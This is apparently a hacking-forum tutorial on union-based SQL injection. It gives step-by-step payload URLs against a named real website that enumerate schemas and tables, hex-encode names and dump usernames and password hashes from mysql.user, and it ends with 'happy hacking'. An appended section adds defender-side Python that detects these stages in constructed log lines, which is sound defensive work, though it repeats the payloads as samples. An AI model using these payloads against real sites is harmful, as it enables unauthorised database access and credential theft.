[Tutorial] Getting Data From Multiple Databases [SQLi]

So I've been seeing a lot of sites with multiple databases, and since I haven't seen a tutorial on this, I figured it would help out some beginners.

I'll be using this link as an example.
http://www.hubbardbrook.org/people/view.php?id=109'

Once you have your column count and your vulnerable columns, you want to get the names of the databases.
You can do that by using:

Code:
group_concat(schema_name)
&
Code:
from information_schema.schemata

So my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.schemata--

Now I see that there are 2 different databases, one called "hbr" and one called "mysql". First write those down in Notepad or something. Next we want to see which one is the default, or current, one.

To find out, you pick your column, and use:
Code:
database()
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

Now where column 4 (my vulnerable column) was, we can see "hbr", so we know that's the current database. Of course, you'd want to search through it for tables that might hold login info. You get the tables the normal way:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--

There are over 100 tables, but I didn't see anything that resembled user info, so now we check the other database. It's almost the same as finding the default database's tables. My other database was called "mysql".
To get its tables, we convert the database name to hex and use:
Code:
where+table_schema=0xdatabasehexhere
So the hex of "mysql" is 6d7973716c.
Make sure you always put 0x in front of your hex.
Now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x6d7973716c--

Now we have the tables from the second database, and we can see that there's a table named user!

Now we get the columns of the user table, but make sure you keep the table_schema of that database. So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572--

0x75736572 is the hex of "user". So basically what I did was convert my table name to hex and get the columns of that table from the second database.
Now we want the data from the columns. It's still almost the same, except for the very last bit.
There are 2 columns named "User" and "Password", which is what we want.
So build your group_concat as usual, but at the end the syntax is:
Code:
+from+databasename.tablename
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(User,0x3a,Password,0x0a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user--

And as you can see, the logins now appear where your vulnerable column was.
Hope you guys understood, happy hacking!
Victoire
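As an added example that is not part of the original post, here is defender-side detection logic in Python that runs over constructed web-server log lines and flags the stages walked through above: the information_schema.schemata listing, the hex-encoded table_schema filter (decoded back to the name it hides), and the direct read of a second schema such as mysql.user, which only succeeds when the application's database account holds SELECT beyond its own schema. The log lines, IP addresses and the /view.php path are constructed for this example.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines (not from any real server): a normal request,
# then the post's sequence: list schemas, list tables of a hex-named schema, read mysql.user.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?id=109 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?id=-109+union+select+1,group_concat(schema_name),3+from+information_schema.schemata-- HTTP/1.1" 200 4210
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?id=-109+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=0x6d7973716c-- HTTP/1.1" 200 4390
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /view.php?id=-109+union+select+1,group_concat(User,0x3a,Password),3+from+mysql.user-- HTTP/1.1" 200 4025
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r'\b0x([0-9a-fA-F]+)\b')
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)
INFO_SCHEMA_RE = re.compile(r'\binformation_schema\.(schemata|tables|columns)\b', re.I)
QUALIFIED_FROM_RE = re.compile(r'\bfrom\s+([a-z_]\w*)\.([a-z_]\w*)', re.I)

def decode_hex_literals(query):
    """Turn MySQL 0x.. literals back into text (0x6d7973716c -> 'mysql')."""
    out = []
    for hexstr in HEX_LITERAL_RE.findall(query):
        if len(hexstr) % 2 == 0:  # an odd-length literal is not a byte string
            out.append(bytes.fromhex(hexstr).decode("ascii", "replace"))
    return out

def analyze_request(raw_path):
    """Classify one request path; returns None when it carries no UNION SELECT."""
    query = unquote_plus(raw_path)  # '+' -> space, %xx -> character
    if not UNION_RE.search(query):
        return None
    finding = {"stage": "union_select", "cross_schema": None,
               "hex_decoded": decode_hex_literals(query)}
    m = INFO_SCHEMA_RE.search(query)
    if m:
        finding["stage"] = "enumerate_" + m.group(1).lower()
    m = QUALIFIED_FROM_RE.search(query)
    if m and m.group(1).lower() != "information_schema":
        # Reading another schema (e.g. mysql.user) is the highest-severity stage; it
        # only works because the app's DB account has SELECT beyond its own schema.
        finding["stage"] = "cross_schema_read"
        finding["cross_schema"] = f"{m.group(1)}.{m.group(2)}"
    return finding

def scan_log(text):
    # Return (line_number, finding) for every request that matches a stage.
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if m and (finding := analyze_request(m.group(1))):
            hits.append((lineno, finding))
    return hits
```

A cross_schema_read hit is also a least-privilege finding for the DBA: an application account granted only its own schema cannot reach mysql.user even when the injection itself exists.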
